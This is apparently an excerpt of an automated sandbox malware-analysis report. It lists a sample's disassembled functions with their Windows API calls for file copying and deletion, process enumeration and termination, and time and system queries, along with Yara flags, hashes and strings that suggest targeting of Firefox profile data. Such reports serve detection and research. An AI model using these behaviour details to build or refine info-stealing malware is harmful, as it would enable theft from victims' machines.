Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007F8867: GetSystemTime.KERNEL32(00420E02,0062CAA4,0042059E,?,?,007E1660,?,0000001A,00420E02,00000000,?,0062C9F0,?,00424EAC,00420DFF), ref: 007F888D

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED528
lstrlen.KERNEL32(00000000), ref: 007ED73F
lstrlen.KERNEL32(00000000), ref: 007ED753
DeleteFileA.KERNEL32(00000000), ref: 007ED7D2

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 056372f9fc14300039143a36fdb13d73d53d675ed0a3e3f2b9e0f1a66ec94e1d
Instruction ID: 25342f5f7872599056f63321c2bdf8649c46b6ba8ad651661074b719b8197ed1
Opcode Fuzzy Hash: 056372f9fc14300039143a36fdb13d73d53d675ed0a3e3f2b9e0f1a66ec94e1d
Instruction Fuzzy Hash: 309115B1D1025CEBCB18FBA4DC9ADFD7335AF14300F504169F64A66151EF786A08DB62

Function 0040D240 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,008499C8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D2C1
lstrlenA.KERNEL32(00000000), ref: 0040D4D8
lstrlenA.KERNEL32(00000000), ref: 0040D4EC
DeleteFileA.KERNEL32(00000000), ref: 0040D56B

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 99b82cc5b77d5c78a28b022103f6ef9d068575481f535cc05e02a2214df8f210
Instruction ID: 8325bb90350937c6619b4da0629272dcf0a8b11a564c510209fa9f55f19f5abf
Opcode Fuzzy Hash: 99b82cc5b77d5c78a28b022103f6ef9d068575481f535cc05e02a2214df8f210
Instruction Fuzzy Hash: CF916472911108ABCB14FBB1DC56EEE7338AF54318F50416EF40772091EF786A98CB6A

Function 007ED827 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007F8867: GetSystemTime.KERNEL32(00420E02,0062CAA4,0042059E,?,?,007E1660,?,0000001A,00420E02,00000000,?,0062C9F0,?,00424EAC,00420DFF), ref: 007F888D

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED8A8
lstrlen.KERNEL32(00000000), ref: 007EDA46
lstrlen.KERNEL32(00000000), ref: 007EDA5A
DeleteFileA.KERNEL32(00000000), ref: 007EDAD9

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 7b8ac2f9ad55ff0ceb0975b96146a58136fe9a99d1aac2f16d538feb3abb42ab
Instruction ID: 0c5cc3924f618dc5467c50abd5f685e0bce8fa5d9d025927da02eee9f1be8975
Opcode Fuzzy Hash: 7b8ac2f9ad55ff0ceb0975b96146a58136fe9a99d1aac2f16d538feb3abb42ab
Instruction Fuzzy Hash: 278111B191024CEBCB14FBE4DC9ADFE7339AF14300F504529F64A66191EF786A08DB66

Function 0040D5C0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,008499C8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D641
lstrlenA.KERNEL32(00000000), ref: 0040D7DF
lstrlenA.KERNEL32(00000000), ref: 0040D7F3
DeleteFileA.KERNEL32(00000000), ref: 0040D872

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 55073c3f02c335b23864c223be7f1f62df3713b3bd211e2b078dd543aa9f2a97
Instruction ID: b9a8a4b288ee9f939e53bd87e1647cffb120ee14b7120403b064e1d16f2d4ef2
Opcode Fuzzy Hash: 55073c3f02c335b23864c223be7f1f62df3713b3bd211e2b078dd543aa9f2a97
Instruction Fuzzy Hash: DC814472911108ABCB14FBB1DC96EEE7339AF54318F40452EF40772091EF786A58CB6A

Function 0040F2E0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421524,00420D7A), ref: 0040F38C
lstrlenA.KERNEL32(00000000), ref: 0040F3AB

Strings

moz-extension+++, xrefs: 0040F3ED
^userContextId=4294967295, xrefs: 0040F3DC

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 5974eceeec0c3ec6e41fe1eeb6206bc14d8ea418494e27deac04d19e744e1c71
Instruction ID: 29c62e45bd112fa8e6d3d1c16e218030d21c495d55cc38802304d1b40baba72e
Opcode Fuzzy Hash: 5974eceeec0c3ec6e41fe1eeb6206bc14d8ea418494e27deac04d19e744e1c71
Instruction Fuzzy Hash: D2513175D01108AACB04FBB1DC56DEE7338AF94314F40812EF81767191EE7C6A58CB6A

Function 007EA0C7 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 007EA0E2
memset.MSVCRT ref: 007EA115
LocalAlloc.KERNEL32(00000040,?), ref: 007EA165

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA457: lstrlen.KERNEL32(007E51BC,?,?,007E51BC,00420DC6), ref: 007FA462
Part of subcall function 007FA457: lstrcpy.KERNEL32(00420DC6,00000000), ref: 007FA4BC

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Strings

@, xrefs: 007EA11E

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @
API String ID: 1400469952-2766056989
Opcode ID: ecdcba2eb2bc88be9dd55a9f406877b3de83ec025a3e449522a219fae87c2a8c
Instruction ID: 7ed94f9a55271eed098d5daae5117c0da32a4ae52f1e97a4462d03ee3814d3f2
Opcode Fuzzy Hash: ecdcba2eb2bc88be9dd55a9f406877b3de83ec025a3e449522a219fae87c2a8c
Instruction Fuzzy Hash: 1A411670A0425CEBCB04DF95C889FEDB7B5BF48304F508018FA09AB295DB78A945CB95

Function 007F91D7 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007F91F2

Part of subcall function 007F8A57: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007F9225,00000000), ref: 007F8A62
Part of subcall function 007F8A57: RtlAllocateHeap.NTDLL(00000000), ref: 007F8A69
Part of subcall function 007F8A57: wsprintfW.USER32 ref: 007F8A7F

OpenProcess.KERNEL32(00001001,00000000,?), ref: 007F92B2
TerminateProcess.KERNEL32(00000000,00000000), ref: 007F92D0
CloseHandle.KERNEL32(00000000), ref: 007F92DD

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: d0896f24eb38d33810f7490cd7a4b7071d3d60b1f98c8697337ab4dbfee1ec50
Instruction ID: ddd1572415ef18b4a3c2bef1b45bd88664b61372874e933b0891e86f9bb25e8a
Opcode Fuzzy Hash: d0896f24eb38d33810f7490cd7a4b7071d3d60b1f98c8697337ab4dbfee1ec50
Instruction Fuzzy Hash: 5631F9B1E0024CEBDB14DFE0CD89BEDB775BF48700F204459E606AA284EB79AA45CB55

Function 00418F70 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00418F8B

Part of subcall function 004187F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00418FBE,00000000), ref: 004187FB
Part of subcall function 004187F0: HeapAlloc.KERNEL32(00000000,?,?,00418FBE,00000000), ref: 00418802
Part of subcall function 004187F0: wsprintfW.USER32 ref: 00418818

OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041904B
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419069
CloseHandle.KERNEL32(00000000), ref: 00419076

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 8e4614f5a012164998350e962700ae9a43f96ea874895dd920f5aa8d00eee1fb
Instruction ID: 3daad27826ff673201e4cbb303e81af6821d19ef8fccaa22ba62c435337ce2e5
Opcode Fuzzy Hash: 8e4614f5a012164998350e962700ae9a43f96ea874895dd920f5aa8d00eee1fb
Instruction Fuzzy Hash: 02316D71E01208AFDB24DFE0CD49BEDB775AF48304F104059F606AB294DBB8AE85CB55

Function 007F8387 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F83D1
Process32First.KERNEL32(?,00000128), ref: 007F83E5
Process32Next.KERNEL32(?,00000128), ref: 007F83FA

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

CloseHandle.KERNEL32(?), ref: 007F8468

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 84c91f438071d244c768eff0fec7a436b7a4baea85b4b9ac069ef1245721cf1d
Instruction ID: b68cb65101fab048deb81c91021467a087a1e9127252dac799043333c4ee9240
Opcode Fuzzy Hash: 84c91f438071d244c768eff0fec7a436b7a4baea85b4b9ac069ef1245721cf1d
Instruction Fuzzy Hash: 97315EB190125CEBCB64EF94DC49FFEB778AF04700F104199B60DA22A0DB786A44CF92

Function 00418120 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041816A
Process32First.KERNEL32(?,00000128), ref: 0041817E
Process32Next.KERNEL32(?,00000128), ref: 00418193

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

CloseHandle.KERNEL32(?), ref: 00418201

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 1c0ad9731fc235f0809ae40197d29312941f037fbe712dbf38eee7264c2240ef
Instruction ID: 6084a3a81ad9197a86b05fcc5bdad381a42aa545a74b9a2169b69cd5b8afd334
Opcode Fuzzy Hash: 1c0ad9731fc235f0809ae40197d29312941f037fbe712dbf38eee7264c2240ef
Instruction Fuzzy Hash: 8E319E71902218ABCB24EF95DC45FEEB778EF04710F10419EE50AA21A0DF386E85CFA5

Function 007F1517 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00420D90), ref: 007F153C
ExitProcess.KERNEL32 ref: 007F1548
strtok_s.MSVCRT ref: 007F155F

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: 62b9825013a9d5c411650a4859db80206d4635d068815287251ad06e4cbbb274
Instruction ID: 30a7f514c632df65b9c80d28d6eadae2368371cf088fa7a424ca22a8c8086258
Opcode Fuzzy Hash: 62b9825013a9d5c411650a4859db80206d4635d068815287251ad06e4cbbb274
Instruction Fuzzy Hash: BB11347490120DEBCB04EFA4D948AFDBB78AF04304F508069E90AA7250E7346B05CB65

Function 007F7687 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DD0,00000000,?), ref: 007F76B7
RtlAllocateHeap.NTDLL(00000000), ref: 007F76BE
GetLocalTime.KERNEL32(?,?,?,?,?,00420DD0,00000000,?), ref: 007F76CB
wsprintfA.USER32 ref: 007F76FA

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 5f2f51bfbe90337ca5e895f9776451138895015e5f3a8196a904fc3d9a46e3df
Instruction ID: f37a8da7aeb80f6f73edcd67002204715b271999610ebf306678aed2190ae5bf
Opcode Fuzzy Hash: 5f2f51bfbe90337ca5e895f9776451138895015e5f3a8196a904fc3d9a46e3df
Instruction Fuzzy Hash: 42113CB2904518ABCB14DFC9DD45FBEB7B9FB4CB11F10411AF605A2290D3795941C7B4

Function 00417420 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DD0,00000000,?), ref: 00417450
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DD0,00000000,?), ref: 00417457
GetLocalTime.KERNEL32(?,?,?,?,?,00420DD0,00000000,?), ref: 00417464
wsprintfA.USER32 ref: 00417493

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 5f2f51bfbe90337ca5e895f9776451138895015e5f3a8196a904fc3d9a46e3df
Instruction ID: 50de9df5f87ad77eb031dc94815d0013ed19ce73efbeceace7c97849f90fee7e
Opcode Fuzzy Hash: 5f2f51bfbe90337ca5e895f9776451138895015e5f3a8196a904fc3d9a46e3df
Instruction Fuzzy Hash: 82113CB2904518ABCB14DFC9DD45FBEB7B9FB4CB11F10411AF605A2290D3795941C7B4

Function 007F7737 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0062CA48,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 007F776A
RtlAllocateHeap.NTDLL(00000000), ref: 007F7771
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0062CA48,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 007F7784
wsprintfA.USER32 ref: 007F77BE

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
Instruction ID: 454236830186023436f85e7398dedbb789a2d2718079a81b8d669a6ad6dbcfc6
Opcode Fuzzy Hash: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
Instruction Fuzzy Hash: 6311A1B1A05618EBEB20DF54DC45FA9B7B9FB44721F100399E60AA32D0C7785944CB55

Function 007F3390 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00420F2C), ref: 007F3399
StrCmpCA.SHLWAPI(?,00420F30), ref: 007F33B3
StrCmpCA.SHLWAPI(?,00420F34), ref: 007F33CD
strtok_s.MSVCRT ref: 007F3448

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 5f7471d827f8d2c7e199e90a9ffd4bdba2f74a4e2864866e50f90aaf628bcda4
Instruction ID: e60e876a63275eff74c75323a78b02f9906a32d591b3d9a6191b1dad8749a9e2
Opcode Fuzzy Hash: 5f7471d827f8d2c7e199e90a9ffd4bdba2f74a4e2864866e50f90aaf628bcda4
Instruction Fuzzy Hash: 0E111571E00249EBCB18CFA5E888BFEB7B5BF04704F10C019E115A6350DB789A06DF54

Function 007F8FE7 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(007F3865,80000000,00000003,00000000,00000003,00000080,00000000,?,007F3865,?), ref: 007F9003
GetFileSizeEx.KERNEL32(000000FF,007F3865), ref: 007F9020
CloseHandle.KERNEL32(000000FF), ref: 007F902E

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 7d4822001714072e4f61ca82e69402512ca1f54a1caf0bddbc00baf73007a473
Instruction ID: bb34ca67be8a1686902836e178598a4aeb6ed783739d313e6f9a89d75f098395
Opcode Fuzzy Hash: 7d4822001714072e4f61ca82e69402512ca1f54a1caf0bddbc00baf73007a473
Instruction Fuzzy Hash: DDF06835E00209FBDB20DFB4DD55F9E77BAAB48710F20C154FB11A7280DA7496028F40

Function 00418D80 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(004135FE,80000000,00000003,00000000,00000003,00000080,00000000,?,004135FE,?), ref: 00418D9C
GetFileSizeEx.KERNEL32(000000FF,004135FE), ref: 00418DB9
CloseHandle.KERNEL32(000000FF), ref: 00418DC7

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 7d4822001714072e4f61ca82e69402512ca1f54a1caf0bddbc00baf73007a473
Instruction ID: 770d00e3666ed0433759a64a5a444c5c6416efc3bd62b2105a0957605b161097
Opcode Fuzzy Hash: 7d4822001714072e4f61ca82e69402512ca1f54a1caf0bddbc00baf73007a473
Instruction Fuzzy Hash: 7AF04F35F00708BBDB24DBB0EC59FDE77BAAB58710F10C258F611A72C0DA7496418B45

Function 007F67FA Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0062CD40,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 007F67D1
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F67EF
CloseHandle.KERNEL32(00000000), ref: 007F6800
Sleep.KERNEL32(00001770), ref: 007F680B
CloseHandle.KERNEL32(?,00000000,?,0062CD40,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 007F6821
